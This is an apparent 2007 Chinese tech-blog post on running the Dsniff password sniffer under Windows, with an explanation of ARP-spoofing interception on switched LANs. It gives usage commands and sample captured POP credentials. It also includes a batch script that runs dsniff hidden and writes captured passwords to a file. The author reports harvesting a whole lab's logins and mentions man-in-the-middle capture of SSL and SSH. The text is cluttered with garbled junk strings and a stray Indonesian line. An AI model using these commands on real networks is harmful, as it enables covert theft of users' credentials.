網絡依然還是計算機,Sun還是Sun！

网络监听Dsniff for win32

上一篇 / 下一篇 2007-09-24 15:32:22 / 个人分类：网络技术

n$d.GT7}$B?o*U)Q0最近两年，网络监听(sniffer)技术出现了新的重要特征。传统的sniffer技术是被动地监听网络通信、用户名和口令。而新的sniffer技术出现了主动地控制通信数据的特点，把sniffer技术扩展到了一个新的领域。Dug Song写的Dsniff的工具是第一批扩展了传统的sniffer概念的监听工具。Dsniff制造数据包注入到网络，并将通信数据重定向到攻击者的机器。在这种方式下，Dsniff允许攻击者在交换环境的网络内窃听数据，甚至在攻击者和攻击目标不在同一个Lan(局域网)的情况下，也能使攻击者收集到他想要的数据   IXPUB技术博客J(Bult.f
IXPUB技术博客j!d:T3c6RS8LF:\A
介绍
Zjc(R6lM#b0
F.r9s\&U&rcr/n0dsniff   IXPUB技术博客nx5NH K^{ T
IXPUB技术博客(I2e0z$~ H5v7h
这是一个口令嗅探器，可以处理的协议类型包括：

yR;R;g6lX0FTP，Telnet，SMTP，HTTP，POP，NNTP，IMAP，SNMP，LDAP，Rlogin，RIP，OSP   IXPUB技术博客-LJ#nc+T6zt

p(zP0g6r*Q0F，PPTP，MS-CHAP，NFS，VRRP，YP/NIS，SOCKS，X11，CVS，IRC，AIM，ICQ，Napster，ostgreSQL，Meeting Maker，Citrix ICA，Symantec，pcAnywhere，NA
IXPUB技术博客+Nn~OlM9G;~
I Sniffer，Microsoft SMB，Oracle QL*Net，Sybase及Microsoft SQL认证信息
3n|AuS0
C:e3Wo zy:\R0国内就是和国外没办法比较啊。简单的dsniff.exe的使用方法都没人给出。全tmd是给下载地址和unix下的使用安全（md,那些猪都会）
t3vU:o.p8u0
f7Y6m P3cUA\w0我把查阅并测试的资料发出来，希望大家不要做破坏……国内的牛淫们太不够意思。其实winnt/2000/2003下的渗透有什么难的嘛，就是sniffer在内网的高效率。其实代码也不是很难实现，可咱不会写啊。
8K5N,i.o.G$f'x@0IXPUB技术博客+os-UU'`%C5i
C:\>dsniff /?
S9uT!}+u x7h0IXPUB技术博客 On7bGd&NHc6v
Usage: dsniff [-n] [-D] [-i interface] [-s snaplen] [-r|-w file]  IXPUB技术博客 W `C!V VJya,F

s(V~#P5^Z b^0C:\>dsniff -D 抓网卡   IXPUB技术博客t|&^-mlJ-\X
IXPUB技术博客z7t]5L#z.FF
Interface Device Description   IXPUB技术博客~p0eC;H,v
IXPUB技术博客K4@*U?`D iM
-------------------------------------------
L$hB%d;IJl B0IXPUB技术博客cxNlk$l e[l
1 \Device\NPF_{3CDD0860-2A1E-4355-B3A7-190F21431018} (Realtek RTL8139/810x Fami   IXPUB技术博客2Z"t*j2J)B3P%as

0o6j H Vmh(R:x0ly Fast Ethernet NIC )
T#rK0yt^0IXPUB技术博客;Z)^ ?tx&F(p0op3G
C:\>dsniff -n -i 1 开始抓密码  IXPUB技术博客i/s g%fL)\7EV

]V!E3a ] ^+U!ld0测试下，登陆我的163信箱
?8R WHOt)E+cj0IXPUB技术博客2F-^ XFHs#~
C:\>dsniff -n -i 1  IXPUB技术博客 R,P6w h"zQ"D#w,N
IXPUB技术博客 nT+Q+Ge6M
-----------------
6e`(E&]p"g0
9| v3?#L7@e L012/06/05 06:31:43 192.168.0.254 -> 202.108.9.194 (pop)  IXPUB技术博客k8}'}hS9T

^#z3[Lu-v4D9X0USER murongxiaoyu
]|"q#q;UL0
%VKYP2mH&Rz0PASS 123456 （密码是假的啦）
r?p%p!Y9_ T^2mt!m0
0w,Y!{gT-J"T0国外的牛人用一些批处理等配合使用  IXPUB技术博客P"g0bI6V#XL

1}X.Z(?z7e*N5J0@echo off   IXPUB技术博客4^NR c#WnU
IXPUB技术博客5[7N;Ge xYJ5S"I:n4}
sm /hidden c:\windows\ds\dsniff.exe -w > password.db
TH*W?!IH0
nI@!b%DB)FM&W,~0dsniff -r password.db > panen.txt 输入一个文本里，方便查询  IXPUB技术博客C.u(e|]'ZA/T

I!feT/J%S(~q/K~&V0j0Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
H{,l"\:R3aq0
dLtDm OICV {D)q0wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP)
ug@m[,j|Z]0IXPUB技术博客0v-?({SXWq\
wpcap.vxd packet.dll 使用前当然要配合winpcap驱动
!B~X'l|uJP:w0IXPUB技术博客@7poE(nNy`
写这个是为了告诉大家dsniff的存在，和简单的使用，不是教大家去做坏事。
T:z-wt'V+pC;]0
8^7\H#I^/b#w0dsniff是一套在局域网环境下面的桥接欺骗工具。  IXPUB技术博客y Al`&B#b"K4tMj
IXPUB技术博客J u1d0Y4ay r"D9d
我们都知道tcpdump，用它可以探听到网络上流过本机的报文流量。
[`H x|v`Q"h2M0IXPUB技术博客]ob};v'iGX4b'b[
但是tcpdump在交换网络下，无法用来探听其他主机间的通信。

5t2|0d?Z%I0在安全方面，有一种经典的攻击方法称为arp欺骗攻击，通过伪造arp报文，欺骗相关的主机，将第三方接入到通讯双方的会话中去，dsniff就是基于这个原理。  IXPUB技术博客YL/o9X%D NNd

8i}6x SF8PqZ0例如在交换网络情况下 a和b中间在进行通信，作为c希望能探听他们之间的谈话，一个简单的方法就是对a宣称我是b 而对b宣称我是a，这样 a 和b都把报文送给了c，如果在c上进行进行探听，并且进行转发，a和b之间根本不能感知到c的存在。其方法就是arp欺骗。  IXPUB技术博客MYTtnQbr

ZY$^/h9f0首先要在c上打开ip_forward功能，让a b间的报文可以进行转发；  IXPUB技术博客P ^j\8Zo SV6r-V#w

5T7Rti/C&]6Kp3Nz G0在用dsniff中的arpsproof软件对a 和b进行arp欺骗，这个时候你  IXPUB技术博客^wp6FkV1cO PG

1h`5l.X3v5?'G0用tcpdump在c上看一下，就会发现ab的报文都发到c上了，  IXPUB技术博客`d}5o_QA]K0V#@
IXPUB技术博客._&UAY#j Ng
这个时候启动dsniff，这个工具的底层实现和tcpdump雷同，但是  IXPUB技术博客P h:^0@0B'tjN
IXPUB技术博客r+z"m'eSWN(?
比较阴险的时候，它能对到达的网络报文进行会话重组，能够还原  IXPUB技术博客L&hg4r,x+F6M vZ

KQu_w!Rg0telnet http msn smtp pop3等多种会话，凡是它发现了有用户名和密码  IXPUB技术博客-[(]sB_K:@
IXPUB技术博客/a'j*n~ELp5w0K,^
出现的时候，它就把用户名和密码截取打印出来。
5r#{] OHc1jal0
J4C5bxs@!|P.z#v.`0我在学校的实验室里面尝试了一下，几分钟内整个实验室里上bbs和web邮箱的  IXPUB技术博客X+wrF*MW4X-t

N9I3p2c;of0V0登陆密码都忽忽的打印出来了。  IXPUB技术博客#W s7O9OzR#c

,|A3Jq"Di4mg'R0这个当然是最简单的傻瓜用法，dsniff包里面还包含了大量的mim窃取密码的方式，在这种方式下即使是ssl方式https 和ssh都是可以被在中途截取的。非常的强大。当然这种方式仅仅用于同一个局域网中。
TtZ(g8Fv?Q0
~-h'ACP b0由于这个东西涉及比较多的安全性，我把其中的操作细节都省略了，不希望初学者拿来乱玩，而是希望管理员能够拿来做点事情。
kGK.t,OF0
|#^]2?A0debian的stable中已经包含了dsniff包，真是很方便。IXPUB技术博客~/wm9AB6^